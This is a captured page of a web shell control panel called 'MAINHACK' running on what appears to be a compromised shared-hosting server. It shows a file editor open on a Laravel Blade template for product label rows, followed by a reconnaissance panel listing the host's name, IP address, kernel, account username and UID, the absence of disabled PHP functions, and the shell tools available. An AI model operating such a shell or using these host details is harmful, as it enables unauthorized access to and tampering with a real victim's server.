[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: show_table_rows.blade.php
@forelse ($products as $product) @php $row_index = $loop->index + $index; @endphp <tr> <td> {{$product->product_name}} @if($product->variation_name != "DUMMY") <b>{{$product->variation_name}}</b> @endif <input type="hidden" name="products[{{$loop->index + $index}}][product_id]" value="{{$product->product_id}}"> <input type="hidden" name="products[{{$loop->index + $index}}][variation_id]" value="{{$product->variation_id}}"> </td> <td> <input type="number" class="form-control" min=1 name="products[{{$loop->index + $index}}][quantity]" value="@if(isset($product->quantity)){{$product->quantity}}@else{{1}}@endif"> </td> @if(request()->session()->get('business.enable_lot_number') == 1) <td> <input type="text" class="form-control" name="products[{{$loop->index + $index}}][lot_number]" value="@if(isset($product->lot_number)){{$product->lot_number}}@endif"> </td> @endif @if(request()->session()->get('business.enable_product_expiry') == 1) <td> <input type="text" class="form-control label-date-picker" name="products[{{$loop->index + $index}}][exp_date]" value="@if(isset($product->exp_date)){{@format_date($product->exp_date)}}@endif"> </td> @endif <td> <input type="text" class="form-control label-date-picker" name="products[{{$loop->index + $index}}][packing_date]" value=""> </td> <td> {!! Form::select('products[' . $row_index . '][price_group_id]', $price_groups, null, ['class' => 'form-control', 'placeholder' => __('lang_v1.none')]); !!} </td> </tr> @empty @endforelse
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285